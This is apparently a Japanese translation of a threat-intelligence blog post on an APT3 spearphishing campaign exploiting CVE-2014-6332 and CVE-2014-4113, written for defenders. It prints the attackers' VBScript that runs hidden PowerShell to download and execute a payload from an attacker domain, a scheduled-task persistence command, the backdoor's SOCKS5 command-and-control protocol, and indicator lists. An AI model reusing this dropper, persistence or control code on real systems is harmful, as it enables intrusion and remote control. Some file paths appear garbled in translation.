APT3 (UPS としても知られる) は、 Operation Clandestine Foxの責任者であり、過去数か月にわたってスピアフィッシング メッセージの波を静かに送信し続けています。この攻撃者は、2014 年 11 月 19 日に複数の組織を標的とした最新のキャンペーンを開始しました。攻撃者は複数のエクスプロイトを利用し、 CVE-2014-6332とCVE- 2014-4113 の両方を標的にしました。 CVE-2014-6332 は 2014 年 11 月 11 日に公開された、Windows OLE Automation Array のリモート コード実行の脆弱性です。 CVE-2014-4113 は、2014 年 10 月 14 日に公開された権限昇格の脆弱性です。
CVE-2014-6332 の使用は注目に値します。これは、犯罪者と APT の両方の複数のクラスのアクターが、このエクスプロイトをツールキットに組み込んでいることを示しています。さらに、APT3 では、これら 2 つの既知の脆弱性の両方が同時に使用されていることが注目に値します。この攻撃者は、広範ではあるがまれなフィッシング キャンペーンでゼロデイ脆弱性を悪用することで歴史的に知られています。既知のエクスプロイトの使用とより頻繁な攻撃は、このグループの戦略と運用テンポの両方の変化を示している可能性があります。
スピアフィッシュ
メッセージの本文は次のとおりです。
プレイボーイ クラブの 1 か月間無料メンバーシップ 1080P HD ビデオ 100,000 枚の写真 4,000 のモデル ヌードセレブ、プレイメイト、サイバーガールなど! hxxp://join.playboysplus.com/signup/ をクリックして、今すぐ無料の Plus メンバーを取得し、別のアップデートを見逃すことはありません。メンバーの紹介は有効なままにしておく必要があります。 1 か月間の無料メンバーシップで「プロモーションを利用できません」というメッセージが表示された場合、メンバーシップの有効期限が切れてから 48 時間以内に問題が発生する可能性があります。Cookie をクリアするか、別のブラウザーを使用するか、別の PC を使用してください。
Web ページには、CVE-2014-6332 エクスプロイト コードと、影響を受けるユーザーのシステムで PowerShell を呼び出して以下のペイロードをダウンロードする VBScript の両方が含まれていました。
関数実行()
エラー時再開次へ
set shell=createobject(“Shell.Application”)
shell.ShellExecute “powershell.exe”,”-NoLogo -NoProfile -NonInteractive -WindowStyle Hidden ( New-Object “System.Net.WebClient”).DownloadFile(“http://www.playboysplus.com /install/install.exe ”,”install.exe”);Invoke-Item install.exe”, “”, “open”, 1
終了機能
このインシデントで確認された CVE-2014-6332 エクスプロイト コードは、 http://www.exploit-db.com/exploits/35230/で公開されたコードから派生したもので、Metasploit プロジェクトにも組み込まれています。
ダウンローダ
エクスプロイトまたはスクリプトが実行されると、システムは次のメタデータを含むinstall.exe をダウンロードします。
MD5 5a0c4e1925c76a959ab0588f683ab437
サイズ 46592 バイト
コンパイル時間 2014-11-19 08:55:10Z
ハッシュ 6b8611f8148a6b51e37fd68e75b6a81c をインポート
ファイルinstall.exeは、2 つのファイル (doc.exe と test.exe) をハードコードされたパス「C:UsersPublic」に書き込もうとしますが、Windows XP ではパスがデフォルトで存在しないため失敗します。
最初にドロップされたファイルdoc.exe には、CVE-2014-4113 エクスプロイトが含まれており、昇格された権限でtest.exeを実行しようとします。これらのファイルには、次のメタデータがあります。
doc.exe (x86):
MD5 492a839a3bf9c61b7065589a18c5aa8d
サイズ 12288 バイト
ハッシュ 9342d18e7d315117f23db7553d59a9d1 をインポート
doc.exe (x64):
MD5 744a17a3bc6dbd535f568ef1e87d8b9a
サイズ 13824 バイト
コンパイル時間 2014-11-19 08:25:45Z
ハッシュ 2fab77a3ff40e4f6d9b5b7e813c618e4 をインポート
test.exe:
MD5 5c08957f05377004376e6a622406f9aa
サイズ 11264 バイト
コンパイル時間 2014-11-18 10:49:23Z
インポート ハッシュ f34d5f2d4577ed6d9ceec516c1f5a744
これらのペイロード ファイルには、興味深い PDB デバッグ文字列も含まれています。
インストール.exe:
c:UsersaaDocumentsVisual Studio 2008ProjectsMShellReleaseMShell.pdb
doc.exe:
c:UsersaaDocumentsVisual Studio 2008Projects13Release13.pdb
test.exe:
C:UsersaaDocumentsVisual Studio 2010ProjectsMyRatClientClientobjx86ReleaseClient.pdb
最も興味深い PDB 文字列は「4113.pdb」で、 CVE-2014-4113 を参照しているようです。この CVE はローカル カーネルの脆弱性であり、悪用に成功すると、マシン上のすべてのユーザーに SYSTEM アクセスを与える可能性があります。
マルウェア コンポーネントであるtest.exeは、Windows コマンド「cmd.exe」 /C whoamiを使用して、「システム」の昇格された権限で実行されていることを確認し、次のスケジュールされたタスクを作成して持続性を作成します。
schtasks /create /tn “mysc” /tr C:UsersPublictest.exe /sc ONLOGON /ru “システム”
マルウェアが実行されると、まず TCP ポート 1913 を使用して 192.157.198.103 への SOCKS5 接続を確立します。マルウェアは SOCKS5 接続要求「05 01 00」を送信し、サーバーの応答が「05 00」で始まることを確認します。次にマルウェアは、コマンド「05 01 00 01 c0 b8 3c e5 00 51」を使用して TCP ポート 81 で 192.184.60.229 への接続を要求し、サーバーからの最初の 2 バイトが「05 00」であることを確認します (c0 b8 3c e5 はIP アドレスであり、00 51 はネットワーク バイト順のポートです)。
サーバーへの接続が確立されると、マルウェアはサーバーから少なくとも 3 バイトを含むメッセージを期待します。これらの最初の 3 バイトは、コマンド ID です。このマルウェアは、次のコマンドをサポートしています。
|
コマンド ID |
説明 |
|
00 00 00 |
コマンド ID が書き込まれた後の内容: C:Users[ユーザー名]AppDataLocalTempnotepad1.exe |
|
00 00 01 |
ファイルを削除します。 C:Users[ユーザー名]AppDataLocalTempnotepad.exe C:Users[ユーザー名]AppDataLocalTempnewnotepad.exe |
|
00 00 02 |
マルウェアの出口 |
|
00 00 03 |
マルウェアは、コマンド ID に続く URL をダウンロードします。ファイルは次の場所に保存されます。 C:Users[ユーザー名]AppDataLocalTempnotepad.exe |
|
00 00 04 |
コマンド ID が書き込まれた後の内容: C:Users[ユーザー名]AppDataLocalTempnotepad2.exe |
|
00 00 05 |
ファイル notepad1.exe と notepad2.exe が連結され、C:Users[ユーザー名]AppDataLocalTempnewnotepad.exe に書き込まれ、実行されます。 |
|
00 00 06 |
次のファイルの内容がサーバーに送信されます。 C:Users[ユーザー名]AppDataLocalTempnote.txt |
|
00 00 07 |
コマンド ID に続く文字列は、「cmd /C」を使用して実行され、結果がサーバーに送信されます |
APT3 へのリンク
10 月 28 日、APT3 が圧縮された実行ファイルの添付ファイルを含むスピアフィッシング メッセージを送信することを確認しました。デフレートされた exe は、上記と同じダウンローダーの亜種であり、SOCKS5 プロキシ経由でポート 1913 経由で198.55.115.71に接続されていました。その場合のセカンダリ ペイロードは、Backdoor.APT.CookieCutter (別名 Pirpi) として検出され、newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67)という名前も付けられ、既知の APT3 ドメインに接続されていました。
inform.bedircati[.]com
pn.ラムサイト[.]com
210.109.99.64
この現在のキャンペーンで確認された192.184.60.229 IP アドレスは、 securitywap[.]comもホストしています。これは、Operation Clandestine Fox ブログで言及されている別の既知のドメインです。
|
ドメイン |
初めて見た |
最後に見たのは |
IPアドレス |
|
securitywap.com |
2014-11-17 |
2014-11-20 |
192.184.60.229 |
|
www.securitywap.com |
2014-11-17 |
2014-11-20 |
192.184.60.229 |
さらに、 join.playboysplus[.]comエクスプロイトおよびペイロード配信サイトは104.151.248.173 に解決されます。
この IP は、過去のキャンペーンで APT3 によって使用された他のドメインをホストしていました。
|
ドメイン |
初めて見た |
最後に見たのは |
IPアドレス |
|
join.playboysplus[.]com |
2014-11-21 |
2014-11-21 |
104.151.248.173 |
|
ウォルタークリーン[.]com |
2014-11-18 |
2014-11-20 |
104.151.248.173 |
|
www.walterclean[.]com |
2014-11-18 |
2014-11-20 |
104.151.248.173 |
以前の APT3 の活動について詳しく説明した以前のブログで説明したように、 walterclean[.]comは Plugx/Kaba コマンド アンド コントロール サーバーとして機能していました。
結論
APT3 は、攻撃にゼロデイ エクスプロイトを使用することでよく知られていますが、最近の活動では、既知のエクスプロイトやソーシャル エンジニアリングでもターゲットを攻撃することが示されています。
Operation Clandestine Fox 以来、この攻撃者がゼロデイ エクスプロイトに依存しない複数の攻撃を実行することを確認しています。この持続的な運用テンポとゼロデイ エクスプロイトの欠如の組み合わせは、このグループが戦略を変更し、より頻繁に攻撃することを決定し、ゼロデイ エクスプロイト コードに安定してアクセスできないことを示している可能性があります。戦略に関係なく、このアクターはうまく機能する能力を示しました。
この脅威の IOC は、こちらで確認できます。
参考: https ://www.mandiant.com/resources/blog/operation-doubletap
Comments